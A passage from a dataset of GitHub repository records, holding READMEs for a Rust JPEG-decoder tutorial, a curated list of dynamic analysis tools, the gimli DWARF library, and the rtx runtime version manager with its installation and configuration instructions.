time, I will also try to write a theoretical basis of JPEG. After all, being able to implement the algorithm does not mean that I understand the principle of the algorithm. However, there is still a lack of theoretical articles. I would like to be a pioneer, even though there are tens of thousands of people.\n\n## Chapter description\n\nFor ease of reading and to give readers a sense of progress, I have divided the entire decoding process into five chapters, and there are appendices explaining the theoretical basis and optimization techniques of JPEG.\n\n- [(1) Overview](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7%A3 %E7%A2%BC%E5%99%A8%EF%BC%88%E4%B8%80%EF%BC%89%E6%A6%82%E8%BF%B0.md): Introduction to JPEG decoding process\n- [(2) Read section](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8% A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E4%BA%8C%EF%BC%89%E6%AA%94%E6%A1%88%E7%B5% 90%E6%A7%8B.md): Introduction to JPEG file structure\n- [(3) Read quantization table and Huffman table](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF %ABjpeg%E8%A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E4%B8%89%EF%BC%89%E8%AE%80%E5%8F%96 %E9%87%8F%E5%8C%96%E8%A1%A8%E3%80%81%E9%9C%8D%E5%A4%AB%E6%9B%BC%E8%A1%A8.md )\n- [(4) Read compressed image data](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg% E8%A7%A3%E7%A2%BC%E5%99%A8%EF%BC%88%E5%9B%9B%EF%BC%89%E8%AE%80%E5%8F%96%E5% A3%93%E7%B8%AE%E5%9C%96%E5%83%8F%E6%95%B8%E6%93%9A.md)\n- [(5) Decoding](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7%A3 %E7%A2%BC%E5%99%A8%EF%BC%88%E4%BA%94%EF%BC%89%E8%A7%A3%E7%A2%BC.md)\n- (Appendix 1) Theoretical Basis\n- [(Appendix 2) Optimization Tips](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7 %A3%E7%A2%BC%E5%99%A8%EF%BC%88%E9%99%84%E9%8C%84%E4%BA%8C%EF%BC%89%E5%84%AA %E5%8C%96%E6%8A%80%E5%B7%A7.md)\n- [(Appendix 3) References](https://github.com/MROS/jpeg_tutorial/blob/master/doc/%E8%B7%9F%E6%88%91%E5%AF%ABjpeg%E8%A7 %A3%E7%A2%BC%E5%99%A8%EF%BC%88%E9%99%84%E9%8C%84%E4%B8%89%EF%BC%89%E5%8F%83 %E8%80%83%E8%B3%87%E6%96%99.md)\n\n## Read math\nGithub does not support writing mathematical formulas in markdown. It is recommended to clone this project and use [typora](https://typora.io/) (open inline mathematical formulas in typora's preferences) or other markdown reading software Come and read, you will have a better experience.\n\n## [Supporting code](https://github.com/MROS/jpeg_tutorial)\n\n### Preparation\n\n- The supporting code is written in rust, please install [rust toolchain](https://www.rust-lang.org/tools/install) first.\n\n### Download code\n```sh\ngit clone https://github.com/MROS/jpeg_tutorial\n```\n\n### Install\n\n```sh\ncd jpeg_tutorial\ncargo install --path .\n```\n`cargo install` will put the compiled executable file `jpeg_tutorial` into ~/.cargo/bin, please make sure ~/.cargo/bin is already in $PATH.\n\n### implement\n\n#### Convert to ppm format\n\nThe default file name of the ppm file is out.ppm\n\n```sh\njpeg_tutorial ppm\n```\n\nWithout subcommands, the preset effect is also converted to ppm\n\n```sh\njpeg_tutorial \n```\n\n#### Print the data of each section\n\n```\njpeg_tutorial reader\n```\n\n#### print only markup code\n\n```\njpeg_tutorial marker\n```\n\n#### Print the status of the specified mcu at each stage of the decoding process\n\n```\njpeg_tutorial mcu \n```\n\nSuppose there is a picture with 8 mcu in height and 12 mcu in width, use\n\n```sh\njpeg_tutorial mcu 7 11\n```\n\nTo get the status of each stage of the mcu in the bottom right corner, notice that the index starts from 0.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "analysis-tools-dev/dynamic-analysis", "link": "https://github.com/analysis-tools-dev/dynamic-analysis", "tags": ["dynamic", "analysis", "dynamic-code-analysis", "dynamic-analysis", "dast"], "stars": 667, "description": "\u2699\ufe0f A curated list of dynamic analysis tools and linters for all programming languages, binaries, and more.", "lang": "Rust", "repo_lang": "", "readme": "\n\n \n \"Analysis\n \n\nThis repository lists **dynamic analysis tools** for all programming languages, build tools, config files and more. The focus is on tools which improve code quality such as linters and formatters.\nThe official website, [analysis-tools.dev](https://analysis-tools.dev/) is based on this repository and adds rankings, user comments, and additional resources like videos for each tool.\n\n[![Website](https://img.shields.io/badge/Website-Online-2B5BAE)](https://analysis-tools.dev)\n![CI](https://github.com/analysis-tools-dev/dynamic-analysis/workflows/CI/badge.svg)\n\n## Sponsors\n\nThis project would not be possible without the generous support of our sponsors.\n\n\n \n \n \n \n \n \n \n
\n\nIf you also want to support this project, head over to our [Github sponsors page](https://github.com/sponsors/analysis-tools-dev).\n\n## Meaning of Symbols:\n\n- :copyright: stands for proprietary software. All other tools are Open Source.\n- :information_source: indicates that the community does not recommend to use this tool for new projects anymore. The icon links to the discussion issue.\n- :warning: means that this tool was not updated for more than 1 year, or the repo was archived.\n\nPull requests are very welcome! \nAlso check out the sister project, [awesome-static-analysis](https://github.com/mre/awesome-static-analysis).\n\n## Table of Contents\n\n#### [Programming Languages](#programming-languages-1)\n\n
\n Show languages\n \n \n
\n\n#### [Multiple languages](#multiple-languages-1)\n\n#### [Other](#other-1)\n\n- [API](#api)\n- [Binaries](#binary)\n- [Bytecode/IR](#bytecode)\n- [Cloud](#cloud)\n- [Containers](#container)\n- [Laravel](#laravel)\n- [Security/DAST](#security)\n- [Web](#web)\n- [WebAssembly](#webassembly)\n- [XML](#xml)\n\n---\n\n## Programming Languages\n\n

.NET

\n\n\n- [Microsoft IntelliTest](https://docs.microsoft.com/en-us/visualstudio/test/intellitest-manual/getting-started?view=vs-2019) \u2014 Generate a candidate suite of tests for your .NET code.\n\n- [Pex and Moles](https://www.microsoft.com/en-us/research/project/pex-and-moles-isolation-and-white-box-unit-testing-for-net/) \u2014 Pex automatically generates test suites with high code coverage using automated white box analysis.\n\n\n

C

\n\n\n- [CHAP](https://github.com/vmware/chap) \u2014 Analyzes un-instrumented ELF core files for leaks, memory growth, and corruption. It helps explain memory growth, can identify some forms of corruption, and supplements a debugger by giving the status of various memory locations.\n\n- [KLEE](https://github.com/klee/klee) \u2014 Symbolic virtual machine built on top of the LLVM compiler infrastructure.\n\n- [LDRA](https://ldra.com) :copyright: \u2014 A tool suite including dynamic analysis and test to various standards can ensure test coverage to 100% op-code, branch & decsion coverage.\n\n- [LLVM/Clang Sanitizers](https://github.com/google/sanitizers) \u2014 \n\n- [tis-interpreter](https://github.com/TrustInSoft/tis-interpreter) \u2014 An interpreter for finding subtle bugs in programs written in standard C.\n\n- [Valgrind](https://valgrind.org/) \u2014 An instrumentation framework for building dynamic analysis tools.\n\n\n

C++

\n\n\n- [CHAP](https://github.com/vmware/chap) \u2014 Analyzes un-instrumented ELF core files for leaks, memory growth, and corruption. It helps explain memory growth, can identify some forms of corruption, and supplements a debugger by giving the status of various memory locations.\n\n- [KLEE](https://github.com/klee/klee) \u2014 Symbolic virtual machine built on top of the LLVM compiler infrastructure.\n\n- [LDRA](https://ldra.com) :copyright: \u2014 A tool suite including dynamic analysis and test to various standards can ensure test coverage to 100% op-code, branch & decsion coverage.\n\n- [LLVM/Clang Sanitizers](https://github.com/google/sanitizers) \u2014 \n\n- [tis-interpreter](https://github.com/TrustInSoft/tis-interpreter) \u2014 An interpreter for finding subtle bugs in programs written in standard C.\n\n- [Valgrind](https://valgrind.org/) \u2014 An instrumentation framework for building dynamic analysis tools.\n\n\n

Go

\n\n\n- [statsviz](https://github.com/arl/statsviz) \u2014 Instant live visualization of your Go application runtime statistics in the browser. It plots heap usage, MSpans/MCaches, Object counts, Goroutines and GC/CPU fraction.\n\n\n

Java

\n\n\n- [Java PathFinder](https://github.com/javapathfinder/jpf-core) \u2014 An extensible software model checking framework for Java bytecode programs.\n\n- [Parasoft Jtest](https://www.parasoft.com/products/jtest) :copyright: \u2014 Jtest is an automated Java software testing and static analysis product that is made by Parasoft. The product includes technology for Data-flow analysis Unit test-case generation and execution, static analysis, regression testing, code coverage, and runtime error detection.\n\n\n

JavaScript

\n\n\n- [Iroh.js](https://github.com/maierfelix/Iroh) \u2014 A dynamic code analysis tool for JavaScript. Iroh allows to record your code flow in realtime, intercept runtime informations and manipulate program behaviour on the fly.\n\n- [Jalangi2](https://github.com/Samsung/jalangi2) \u2014 Jalangi2 is a popular framework for writing dynamic analyses for JavaScript.\n\n\n

PHP

\n\n\n- [Enlightn](https://www.laravel-enlightn.com/) \u2014 A static and dynamic analysis tool for Laravel applications that provides recommendations to improve the performance, security and code reliability of Laravel apps. Contains 120 automated checks.\n\n\n

Python

\n\n\n- [CrossHair](https://github.com/pschanely/CrossHair) \u2014 Symbolic execution engine for testing Python contracts.\n\n- [icontract](https://github.com/Parquery/icontract) \u2014 Design-by-contract library supporting behavioral subtyping\nThere is also a wider tooling around the icontract library such as a linter (pyicontract-lint) and a plug-in for Sphinx (sphinx-icontract).\n\n- [Scalene](https://github.com/emeryberger/scalene) \u2014 A high-performance, high-precision CPU and memory profiler for Python\n\n- [typo](https://github.com/aldanor/typo) \u2014 Runtime Type Checking for Python 3.\n\n\n

Ruby

\n\n\n- [suture](https://github.com/testdouble/suture) \u2014 A Ruby gem that helps you refactor your legacy code by the result of some old behavior with a new version.\n\n\n

Rust

\n\n\n- [cargo-careful](https://github.com/RalfJung/cargo-careful) \u2014 Execute Rust code carefully, with extra checking along the way. It builds the standard library with debug assertions.\nHere are some of the checks this enables:\n* `get_unchecked` in slices performs bounds checks * `copy`, `copy_nonoverlapping`, and `write_bytes` check that pointers are aligned and non-null and (if applicable) non-overlapping `{NonNull,NonZero*,...}::new_unchecked` check that the value is valid * plenty of internal consistency checks in the collection types * mem::zeroed and the deprecated mem::uninitialized panic if the type does not allow that kind of initialization\n\n- [loom](https://github.com/tokio-rs/loom) \u2014 Concurrency permutation testing tool for Rust. It runs a test many times, permuting the possible concurrent executions of that test.\n\n- [MIRI](https://github.com/rust-lang/miri) \u2014 An interpreter for Rust's mid-level intermediate representation, which can detect certain classes of undefined behavior like out-of-bounds memory accesses and use-after-free.\n\n- [puffin](https://github.com/EmbarkStudios/puffin) \u2014 Instrumentation profiler for Rust.\n\n- [rust-san](https://github.com/japaric/rust-san) \u2014 How-to sanitize your Rust code with built-in Rust dynamic analyzers\n\n- [stuck](https://github.com/jonhoo/stuck) \u2014 provides a visualization for quickly identifying common bottlenecks in running, asynchronous, and concurrent applications.\n\n\n

SQL

\n\n\n- [WhiteHat Sentinel Dynamic](https://www.synopsys.com/software-integrity/security-testing/dast.html) :copyright: \u2014 Part of the WhiteHat Application Security Platform. Dynamic application security scanner that covers the OWASP Top 10.\n\n\n

Visual Basic

\n\n\n- [VB Watch](https://www.aivosto.com/vbwatch.html) :copyright: \u2014 Profiler, Protector and Debugger for VB6. Profiler measures performance and test coverage. Protector implements robust error handling. Debugger helps monitor your executables.\n\n\n## Multiple languages\n\n\n- [CASR](https://crates.io/crates/casr) \u2014 Crash Analysis and Severity Report.\n\n- [Code Pulse](http://code-pulse.com/) \u2014 Code Pulse is a free real-time code coverage tool for penetration testing activities by OWASP and Code Dx ([GitHub](https://github.com/codedx/codepulse)).\n\n- [Sydr](https://sydr-fuzz.github.io/) :copyright: \u2014 Continuous Hybrid Fuzzing and Dynamic Analysis for Security Development Lifecycle.\n\n\n## Other\n\n\n\n

API

\n\n\n- [Smartbear](https://smartbear.com/) :copyright: \u2014 Test automation and performance testing platform\n\n\n

Binaries

\n\n\n- [angr](https://github.com/angr/angr) \u2014 Platform agnostic binary analysis framework from UCSB.\n\n- [BOLT](https://github.com/facebookincubator/BOLT) \u2014 Binary Optimization and Layout Tool - A linux command-line utility used for optimizing performance of binaries with profile guided permutation of linking to improve cache efficiency\n\n- [Dr. Memory](https://drmemory.org/) \u2014 Dr. Memory is a memory monitoring tool capable of identifying memory-related programming errors ([Github](https://github.com/DynamoRIO/drmemory)).\n\n- [DynamoRIO](http://www.dynamorio.org/) \u2014 Is a runtime code manipulation system that supports code transformations on any part of a program, while it executes.\n\n- [llvm-propeller](https://github.com/google/llvm-propeller) \u2014 Profile guided hot/cold function splitting to improve cache efficiency. An alternative to BOLT by Facebook\n\n- [Pin Tools](https://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool) \u2014 A dynamic binary instrumentation tool and a platform for creating analysis tools.\n\n- [TRITON](https://triton.quarkslab.com/) \u2014 Dynamic Binary Analysis for x86 binaries.\n\n\n

Bytecode/IR

\n\n\n- [souper](https://github.com/google/souper) \u2014 optimize LLVM IR with SMT solvers\n\n\n

Cloud

\n\n\n- [prowler](https://prowler.pro) \u2014 Prowler is an Open Source security tool to perform AWS and Azure security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.\nIt contains hundreds of controls covering CIS, PCI-DSS, ISO27001, GDPR, HIPAA, FFIEC, SOC2, AWS FTR, ENS and custom security frameworks.\n\n\n

Containers

\n\n\n- [cadvisor](https://github.com/google/cadvisor) \u2014 Analyzes resource usage and performance characteristics of running containers.\n\n\n

Laravel

\n\n\n- [Enlightn](https://www.laravel-enlightn.com/) \u2014 A static and dynamic analysis tool for Laravel applications that provides recommendations to improve the performance, security and code reliability of Laravel apps. Contains 120 automated checks.\n\n\n

Security/DAST

\n\n\n- [AppScan Standard](https://www.hcltechsw.com/products/appscan) :copyright: \u2014 HCL's AppScan is a dynamic application security testing suite ([previously by IBM](https://newsroom.ibm.com/2018-12-06-HCL-Technologies-to-Acquire-Select-IBM-Software-Products-for-1-8B)).\n\n- [Enlightn](https://www.laravel-enlightn.com/) \u2014 A static and dynamic analysis tool for Laravel applications that provides recommendations to improve the performance, security and code reliability of Laravel apps. Contains 120 automated checks.\n\n- [WhiteHat Sentinel Dynamic](https://www.synopsys.com/software-integrity/security-testing/dast.html) :copyright: \u2014 Part of the WhiteHat Application Security Platform. Dynamic application security scanner that covers the OWASP Top 10.\n\n\n

Web

\n\n\n- [Smartbear](https://smartbear.com/) :copyright: \u2014 Test automation and performance testing platform\n\n\n

WebAssembly

\n\n\n- [Wasabi](https://github.com/danleh/wasabi) \u2014 Wasabi is a framework for writing dynamic analyses for WebAssembly, written in JavaScript.\n\n\n

XML

\n\n\n- [WhiteHat Sentinel Dynamic](https://www.synopsys.com/software-integrity/security-testing/dast.html) :copyright: \u2014 Part of the WhiteHat Application Security Platform. Dynamic application security scanner that covers the OWASP Top 10.\n\n\n## License\n\n[![CC0](https://i.creativecommons.org/p/zero/1.0/88x31.png)](https://creativecommons.org/publicdomain/zero/1.0/)\n\nTo the extent possible under law, [Matthias Endler](https://endler.dev) has waived all copyright and related or neighboring rights to this work.\nThe underlying source code used to format and display that content is licensed under the MIT license.\n\nTitle image [Designed by Freepik](http://www.freepik.com).", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gimli-rs/gimli", "link": "https://github.com/gimli-rs/gimli", "tags": ["dwarf", "rust", "cross-platform"], "stars": 667, "description": "A library for reading and writing the DWARF debugging format", "lang": "Rust", "repo_lang": "", "readme": "# `gimli`\n\n[![](https://img.shields.io/crates/v/gimli.svg) ![](https://img.shields.io/crates/d/gimli.svg)](https://crates.io/crates/gimli)\n[![](https://docs.rs/gimli/badge.svg)](https://docs.rs/gimli/)\n[![Build Status](https://github.com/gimli-rs/gimli/workflows/Rust/badge.svg)](https://github.com/gimli-rs/gimli/actions)\n[![Coverage Status](https://coveralls.io/repos/github/gimli-rs/gimli/badge.svg?branch=master)](https://coveralls.io/github/gimli-rs/gimli?branch=master)\n\n`gimli` is a library for reading and writing the\n[DWARF debugging format](https://dwarfstd.org/).\n\n* **Zero copy:** everything is just a reference to the original input buffer. No\n copies of the input data get made.\n\n* **Lazy:** you can iterate compilation units without parsing their\n contents. Parse only as many debugging information entry (DIE) trees as you\n iterate over. `gimli` also uses `DW_AT_sibling` references to avoid parsing a\n DIE's children to find its next sibling, when possible.\n\n* **Cross-platform:** `gimli` makes no assumptions about what kind of object\n file you're working with. The flipside to that is that it's up to you to\n provide an ELF loader on Linux or Mach-O loader on macOS.\n\n * Unsure which object file parser to use? Try the cross-platform\n [`object`](https://github.com/gimli-rs/object) crate. See the\n [`examples/`](./examples) directory for usage with `gimli`.\n\n## Install\n\nAdd this to your `Cargo.toml`:\n\n```toml\n[dependencies]\ngimli = \"0.27.2\"\n```\n\nThe minimum supported Rust version is 1.42.0.\n\n## Documentation\n\n* [Documentation on docs.rs](https://docs.rs/gimli/)\n\n* Example programs:\n\n * [A simple `.debug_info` parser](./examples/simple.rs)\n\n * [A simple `.debug_line` parser](./examples/simple_line.rs)\n\n * [A `dwarfdump` clone](./examples/dwarfdump.rs)\n\n * [An `addr2line` clone](https://github.com/gimli-rs/addr2line)\n\n * [`ddbug`](https://github.com/gimli-rs/ddbug), a utility giving insight into\n code generation by making debugging information readable.\n\n * [`dwprod`](https://github.com/fitzgen/dwprod), a tiny utility to list the\n compilers used to create each compilation unit within a shared library or\n executable (via `DW_AT_producer`).\n\n * [`dwarf-validate`](./examples/dwarf-validate.rs), a program to validate the\n integrity of some DWARF and its references between sections and compilation\n units.\n\n## License\n\nLicensed under either of\n\n * Apache License, Version 2.0 ([`LICENSE-APACHE`](./LICENSE-APACHE) or https://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([`LICENSE-MIT`](./LICENSE-MIT) or https://opensource.org/licenses/MIT)\n\nat your option.\n\n## Contribution\n\nSee [CONTRIBUTING.md](./CONTRIBUTING.md) for hacking.\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jdxcode/rtx", "link": "https://github.com/jdxcode/rtx", "tags": [], "stars": 668, "description": "Runtime Executor (asdf rust clone)", "lang": "Rust", "repo_lang": "", "readme": "\n# [rtx](https://github.com/jdxcode/rtx)\n\n[![Crates.io](https://img.shields.io/crates/v/rtx-cli.svg)](https://crates.io/crates/rtx-cli)\n[![License: MIT](https://img.shields.io/github/license/jdxcode/rtx)](https://github.com/jdxcode/rtx/blob/main/LICENSE)\n[![CI](https://github.com/jdxcode/rtx/actions/workflows/rtx.yml/badge.svg?branch=main)](https://github.com/jdxcode/rtx/actions/workflows/rtx.yml)\n[![Codecov](https://codecov.io/gh/jdxcode/rtx/branch/main/graph/badge.svg?token=XYH3Q0BOO0)](https://codecov.io/gh/jdxcode/rtx)\n[![Discord](https://img.shields.io/discord/1066429325269794907)](https://discord.gg/mABnUDvP57)\n\n_Polyglot runtime manager (asdf rust clone)_\n\n## 30 Second Demo\n\nThe following shows using rtx to install node, python, and jq into a project using a `.tool-versions` file.\n\n[![demo](./docs/demo.gif)](./docs/demo.gif)\n\n## Features\n\n- **asdf-compatible** - rtx is compatible with asdf plugins and `.tool-versions` files. It can be used as a drop-in replacement.\n- **Polyglot** - compatible with any language, so no more figuring out how nvm, nodenv, pyenv, etc work individually\u2014just use 1 tool.\n- **Fast** - rtx is written in Rust and is very fast. 20x-200x faster than asdf.\n- **No shims** - shims (used by asdf) cause problems, they break `which node`, and add overhead. We don't use them.\n- **Better UX** - asdf is full of strange UX decisions (like `asdf plugin add` but also `asdf install`). We've taken care to make rtx easy to use.\n- **Fuzzy matching and aliases** - no need to specify exact version numbers like with asdf.\n- **One command install** - No need to manually install each plugin, just run `rtx install` and it will install all the plugins you need.\n\n## Quickstart\n\nInstall rtx (other methods [here](#installation)):\n\n```sh-session\n$ curl https://rtx.pub/rtx-latest-macos-arm64 > ~/bin/rtx\n$ chmod +x ~/bin/rtx\n$ rtx --version\nrtx 1.10.1\n```\n\nHook rtx into to your shell. This will automatically add `~/bin` to `PATH` if it isn't already.\n(choose one, and open a new shell session for the changes to take effect):\n\n```sh-session\n$ echo 'eval \"$(~/bin/rtx activate bash)\"' >> ~/.bashrc\n$ echo 'eval \"$(~/bin/rtx activate zsh)\"' >> ~/.zshrc\n$ echo '~/bin/rtx activate fish | source' >> ~/.config/fish/config.fish\n```\n\n> **Warning**\n>\n> If you use direnv, you will want to activate direnv _before_ rtx. There is also\n> an alternative way to use rtx inside of direnv, see [here](#direnv).\n\nInstall a runtime and set it as the default:\n\n```sh-session\n$ rtx install nodejs@18\n$ rtx global nodejs@18\n$ node -v\nv18.10.9\n```\n\n> **Note**\n>\n> `rtx install` is optional, `rtx global` will prompt to install the runtime if it's not\n> already installed. This is configurable in [`~/.config/rtx/config.toml`](#configuration).\n\n\n## About\n\nrtx is a tool for managing programming language and tool versions. For example, use this to install\na particular version of node.js and ruby for a project. Using `rtx activate`, you can have your\nshell automatically switch to the correct node and ruby versions when you `cd` into the project's\ndirectory. Other projects on your machine can use a different set of versions.\n\nrtx is inspired by [asdf](https://asdf-vm.com) and uses asdf's vast [plugin ecosystem](https://github.com/asdf-vm/asdf-plugins)\nunder the hood. However, it is _much_ faster than asdf and has a more friendly user experience.\nFor more on how rtx compares to asdf, [see below](#comparison-to-asdf). The goal of this project\nwas to create a better front-end to asdf.\n\nIt uses the same `.tool-versions` file that asdf uses. It's also compatible with idiomatic version\nfiles like `.node-version` and `.ruby-version`. See [Legacy Version Files](#legacy-version-files) below.\n\nCome chat about rtx on [discord](https://discord.gg/mABnUDvP57).\n\n### How it works\n\nrtx installs as a shell extension (e.g. `rtx activate zsh`) that sets the `PATH`\nenvironment variable to point your shell to the correct runtime binaries. When you `cd` into a\ndirectory containing a `.tool-versions` file, rtx will automatically activate the correct versions.\n\nEvery time your prompt starts it will call `rtx hook-env` to fetch new environment variables. This\nshould be very fast and it exits early if the the directory wasn't changed or the `.tool-versions`\nfiles haven't been updated. On my machine this takes 4ms in the fast case, 14ms in the slow case. See [Performance](#performance) for more on this topic.\n\nUnlike asdf which uses shim files to dynamically locate runtimes when they're called, rtx modifies\n`PATH` ahead of time so the runtimes are called directly. This is not only faster since it avoids\nany overhead, but it also makes it so commands like `which node` work as expected. This also\nmeans there isn't any need to run `asdf reshim` after installing new runtime binaries.\n\n### Common example commands\n\n rtx install nodejs@20.0.0 Install a specific version number\n rtx install nodejs@20.0 Install a fuzzy version number\n rtx local nodejs@20 Use node-20.x in current project\n rtx global nodejs@20 Use node-20.x as default\n\n rtx install nodejs Install the version specified in .tool-versions\n rtx local nodejs@latest Use latest node in current directory\n rtx global nodejs@system Use system node as default\n\n rtx x nodejs@20 -- node app.js Run `node app.js` with the PATH pointing to node-20.x\n\n## Installation\n\n> **Warning**\n>\n> Regardless of the installation method, when uninstalling rtx,\n> remove `RTX_DATA_DIR` folder (usually `~/.local/share/rtx`) to fully clean up.\n\n### Standalone\n\nNote that it isn't necessary for `rtx` to be on `PATH`. If you run the activate script in your rc\nfile, rtx will automatically add itself to `PATH`.\n\n```sh-session\n$ curl https://rtx.pub/install.sh | sh\n```\n\n> **Note**\n>\n> There isn't currently an autoupdater in rtx. So if you use this method you'll need to remember\n> to fetch a new version manually for bug/feature fixes. I'm not sure if I'll ever add an autoupdater\n> because it might be disruptive to autoupdate to a major version that has breaking changes.\n\nor if you're allergic to `| sh`:\n\n```sh-session\n$ curl https://rtx.pub/rtx-latest-macos-arm64 > /usr/local/bin/rtx\n```\n\nIt doesn't matter where you put it. So use `~/bin`, `/usr/local/bin`, `~/.local/share/rtx/bin/rtx`\nor whatever.\n\nSupported architectures:\n\n- `x64`\n- `arm64`\n\nSupported platforms:\n\n- `macos`\n- `linux`\n\nIf you need something else, compile it with [cargo](#cargo).\n\n### Homebrew\n\nThere are 2 ways to install rtx with Homebrew. The recommended method is to use\nthe custom tap which will always contain the latest release.\n\n```sh-session\n$ brew install jdxcode/tap/rtx\n```\n\nAlternatively, you can use the built-in tap (homebrew-core), which will be updated\nonce Homebrew maintainers merge the PR for a new release:\n\n```sh-session\n$ brew install rtx\n```\n\n### Cargo\n\nBuild from source with Cargo.\n\n```sh-session\n$ cargo install rtx-cli\n```\n\nDo it faster with [cargo-binstall](https://github.com/cargo-bins/cargo-binstall):\n\n```sh-session\n$ cargo install cargo-binstall\n$ cargo binstall rtx-cli\n```\n\n### npm\n\nrtx is available on npm as precompiled binaries. This isn't a node.js package, just distributed\nvia npm. It can be useful for JS projects that want to setup rtx via `package.json` or `npx`.\n\n```sh-session\n$ npm install -g @jdxcode/rtx\n```\n\nOr use npx if you just want to test it out for a single command without fully installing:\n\n```sh-session\n$ npx @jdxcode/rtx exec python@3.11 -- python some_script.py\n```\n\n### GitHub Releases\n\nDownload the latest release from [GitHub](https://github.com/jdxcode/rtx/releases).\n\n```sh-session\n$ curl https://github.com/jdxcode/rtx/releases/download/v1.10.1/rtx-v1.10.1-linux-x64 | tar -xJv\n$ mv rtx/bin/rtx /usr/local/bin\n```\n\n### apt\n\nFor installation on Ubuntu/Debian:\n\n```sh-session\nwget -qO - https://rtx.pub/gpg-key.pub | gpg --dearmor | sudo tee /usr/share/keyrings/rtx-archive-keyring.gpg 1> /dev/null\necho \"deb [signed-by=/usr/share/keyrings/rtx-archive-keyring.gpg arch=amd64] https://rtx.pub/deb stable main\" | sudo tee /etc/apt/sources.list.d/rtx.list\nsudo apt update\nsudo apt install -y rtx\n```\n\n> **Warning**\n>\n> If you're on arm64 you'll need to run the following:\n> ```\n> echo \"deb [signed-by=/usr/share/keyrings/rtx-archive-keyring.gpg arch=arm64] https://rtx.pub/deb stable main\" | sudo tee /etc/apt/sources.list.d/rtx.list\n> ```\n\n### dnf\n\nFor Fedora, CentOS, Amazon Linux, RHEL and other dnf-based distributions:\n\n```sh-session\ndnf install -y dnf-plugins-core\ndnf config-manager --add-repo https://rtx.pub/rpm/rtx.repo\ndnf install -y rtx\n```\n\n### yum\n\n```sh-session\nyum install -y yum-utils\nyum-config-manager --add-repo https://rtx.pub/rpm/rtx.repo\nyum install -y rtx\n```\n\n### ~~apk~~ (coming soon)\n\nFor Alpine Linux:\n\n```sh-session\napk add rtx --repository=http://dl-cdn.alpinelinux.org/alpine/edge/testing/\n```\n\n### aur\n\nFor Arch Linux:\n\n```sh-session\ngit clone https://aur.archlinux.org/rtx.git\ncd rtx\nmakepkg -si\n```\n\n## Other Shells\n\n### Bash\n\n```sh-session\n$ echo 'eval \"$(rtx activate bash)\"' >> ~/.bashrc\n```\n\n### Fish\n\n```sh-session\n$ echo 'rtx activate fish | source' >> ~/.config/fish/config.fish\n```\n\n### Xonsh\n\nSince `.xsh` files are [not compiled](https://github.com/xonsh/xonsh/issues/3953) you may shave a bit off startup time by using a pure Python import: add the code below to, for example, `~/.config/xonsh/rtx.py` config file and `import rtx` it in `~/.config/xonsh/rc.xsh`:\n```xsh\nfrom pathlib \timport Path\nfrom xonsh.built_ins\timport XSH\n\nctx = XSH.ctx\nrtx_init = subprocess.run([Path('~/bin/rtx').expanduser(),'activate','xonsh'],capture_output=True,encoding=\"UTF-8\").stdout\nXSH.builtins.execx(rtx_init,'exec',ctx,filename='rtx')\n```\n\nOr continue to use `rc.xsh`/`.xonshrc`:\n```xsh\necho 'execx($(~/bin/rtx activate xonsh))' >> ~/.config/xonsh/rc.xsh # or ~/.xonshrc\n```\n\nGiven that `rtx` replaces both shell env `$PATH` and OS environ `PATH`, watch out that your configs don't have these two set differently (might throw `os.environ['PATH'] = xonsh.built_ins.XSH.env.get_detyped('PATH')` at the end of a config to make sure they match)\n\n### Something else?\n\nAdding a new shell is not hard at all since very little shell code is\nin this project.\n[See here](https://github.com/jdxcode/rtx/tree/main/src/shell) for how\nthe others are implemented. If your shell isn't currently supported\nI'd be happy to help you get yours integrated.\n\n## Configuration\n\n### `.tool-versions`\n\nThe `.tool-versions` file is used to specify the runtime versions for a project. An example of this\nis:\n\n```\nnodejs 20.0.0 # comments are allowed\nruby 3 # can be fuzzy version\nshellcheck latest # also supports \"latest\"\njq 1.6\n```\n\nCreate `.tool-versions` files manually, or use [`rtx local`](#rtx-local) to create them automatically.\nSee [the asdf docs](https://asdf-vm.com/manage/configuration.html#tool-versions) for more info on this file format.\n\n### Legacy version files\n\nRTX supports \"legacy version files\" just like asdf.\n\nIt's behind a config setting \"legacy_version_file\", but it's enabled by default (asdf defaults to disabled).\nYou can disable these with `rtx settings set legacy_version_file false`. There is a performance cost\nto having these when they're parsed as it's performed by the plugin in `bin/parse-version-file`. However\nthese are [cached](#cache-behavior) so it's not a huge deal. You may not even notice.\n\nThese are ideal for setting the runtime version of a project without forcing other developers to\nuse a specific tool like rtx/asdf.\n\nThey support aliases, which means you can (finally) have an `.nvmrc` file with `lts/hydrogen`\nand it will work in rtx _and_ nvm. This wasn't possible with asdf.\n\nHere are some of the supported legacy version files:\n\n| Plugin | \"Legacy\" (Idiomatic) Files |\n| --------- | -------------------------------------------------- |\n| crystal | `.crystal-version` |\n| elixir | `.exenv-version` |\n| golang | `.go-version`, `go.mod` |\n| java | `.java-version` |\n| nodejs | `.nvmrc`, `.node-version` |\n| python | `.python-version` |\n| ruby | `.ruby-version`, `Gemfile` |\n| terraform | `.terraform-version`, `.packer-version`, `main.tf` |\n| yarn | `.yvmrc` |\n\n> **Note**\n>\n> asdf calls these \"legacy version files\" so we do too. I think this is a bad name since it implies\n> that they shouldn't be used\u2014which is 